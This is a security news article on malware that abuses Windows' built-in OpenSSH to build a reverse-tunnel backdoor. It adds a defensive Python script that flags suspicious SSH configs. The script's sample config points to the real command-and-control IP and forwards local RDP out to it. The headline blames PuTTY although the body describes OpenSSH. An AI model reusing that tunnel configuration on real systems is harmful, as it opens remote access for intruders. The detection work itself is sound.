Hackers Exploit Free SSH Client PuTTY to Deploy Malware on Windows Systems

Cybersecurity researchers have uncovered a sophisticated malware campaign that exploits Windows’ built-in OpenSSH client to establish persistent backdoors on victim systems.

The discovery highlights how legitimate administrative tools can be weaponized by threat actors, transforming essential network utilities into attack vectors that bypass traditional security measures.

Security analyst Xavier Mertens from the Internet Storm Center identified a malicious sample masquerading as “dllhost.exe” that specifically targets Windows systems with OpenSSH installations.

The file, which received an 18/71 detection score on VirusTotal, demonstrates how attackers are adapting their techniques to leverage Microsoft’s decision to include OpenSSH as a default component in Windows 10 version 1803.

The malware represents a concerning evolution in attack methodologies, as SSH clients like PuTTY have been trusted tools for system administrators for years.

However, this trust has been repeatedly exploited, with previous incidents involving trojanized versions of PuTTY being deployed by threat groups like UNC4034.

The integration of OpenSSH into Windows has inadvertently expanded the attack surface, providing malicious actors with new opportunities to abuse legitimate functionality.


The malware employs a multi-stage approach to establish persistence and maintain communication with command-and-control infrastructure.


Initially, it attempts to start an existing “SSHService” service on the target system. If unsuccessful, the malware queries a specific registry key (SOFTWARESSHservice) to retrieve a previously saved random port number from earlier infections.

During first-time execution, the malware generates a random port number and stores it in the registry for future use.

It then creates a malicious SSH configuration file in the Windows temp directory that contains connection details for the attacker’s command-and-control server.


The configuration specifies a remote server at IP address 193.187.174.3, using port 443 for communication and implementing remote port forwarding to establish the backdoor connection.

The malware enters an infinite loop with extended sleep intervals between iterations, periodically launching ssh.exe processes with the crafted configuration file.

This approach allows the malware to maintain persistent access while appearing as legitimate SSH traffic, potentially evading network monitoring systems that might otherwise flag suspicious connections.

Recommendations

The discovery underscores the growing trend of “Living off the Land” attacks, where threat actors abuse legitimate system binaries and tools rather than deploying custom malware.

OpenSSH’s classification as a “LOLBIN” (Living Off the Land Binary) reflects its potential for misuse in unauthorized activities, including data exfiltration through scp.exe and remote access through ssh.exe.

According to the report, organizations should implement comprehensive monitoring of OpenSSH usage, focusing in particular on unusual configuration files, unexpected service installations, and suspicious network connections to external IP addresses.

Registry monitoring for the specific keys used by this malware family can provide early detection capabilities.

Additionally, network administrators should establish baseline SSH usage patterns and investigate deviations that might indicate compromise.
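As an added illustration of the configuration-file monitoring recommended here (not code from the report or the researchers), the following script parses an OpenSSH client config and flags the traits described above: a RemoteForward reverse tunnel, a non-standard port such as 443, and a HostName outside an assumed allowlist. The sample config is constructed for this example; only the IP address and port come from the article.

```python
"""Flag ssh_config-style files showing the traits described above: a RemoteForward
reverse tunnel, a non-standard port such as 443, or a HostName outside an allowlist."""
import re

# Assumption: the hosts your administrators are actually allowed to SSH to.
APPROVED_HOSTS = {"bastion.corp.example"}

# Constructed sample modelled on the article (IP/port from the article), not the real dropped file.
SAMPLE_CONFIG = """\
# dropped into the Windows temp directory
Host relay
    HostName 193.187.174.3
    Port 443
    RemoteForward 2222 127.0.0.1:3389
"""

def parse_ssh_config(text):
    """Return {host_alias: {keyword_lowercase: value}}; options before any Host go to '*'."""
    blocks, alias = {}, "*"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "host":
            alias = value
            blocks.setdefault(alias, {})
        else:
            blocks.setdefault(alias, {})[key] = value
    return blocks

def find_indicators(text):
    """Map each Host block to the suspicious traits it shows; clean blocks are omitted."""
    report = {}
    for alias, opts in parse_ssh_config(text).items():
        hits = []
        if "remoteforward" in opts:
            hits.append("RemoteForward (reverse tunnel): " + opts["remoteforward"])
        if opts.get("port", "22") != "22":
            hits.append("non-standard Port " + opts["port"])
        host = opts.get("hostname")
        if host and host not in APPROVED_HOSTS:
            hits.append("HostName not in allowlist: " + host)
        if hits:
            report[alias] = hits
    return report
```

Run `find_indicators` over the contents of any config file found in the Windows temp directory or passed to ssh.exe via `-F`; a non-empty result is a candidate for investigation.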

The incident demonstrates that even beneficial security improvements, such as Microsoft’s inclusion of OpenSSH in Windows, can introduce new attack vectors that require updated defensive strategies and enhanced monitoring capabilities.


The post Hackers Exploit Free SSH Client PuTTY to Deploy Malware on Windows Systems appeared first on Cyber Security News.
